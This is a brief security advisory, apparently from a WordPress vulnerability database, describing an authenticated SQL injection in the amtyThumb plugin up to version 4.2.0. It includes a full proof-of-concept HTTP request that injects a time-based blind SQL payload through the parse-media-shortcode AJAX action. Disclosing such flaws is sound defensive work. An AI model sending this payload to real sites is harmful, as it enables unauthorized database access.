amtyThumb <= 4.2.0 - Subscriber+ SQLi

The plugin does not sanitise and escape a parameter before using it in a SQL statement via its shortcode, leading to an SQL injection and is exploitable by any authenticated user (and not just Author+ like the original advisory mention) due to the fact that they can execute shortcodes via an AJAX action

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 168 Connection: close Cookie: [any authenticated user] action=parse-media-shortcode&shortcode;=%5bamtyThumbOnly%20percent%3d50%20post_id%3d1%2f**%2fAND%2f**%2f(SELECT%2f**%2f7741%2f**%2fFROM%2f**%2f(SELECT(SLEEP(5)))hlAf)%5d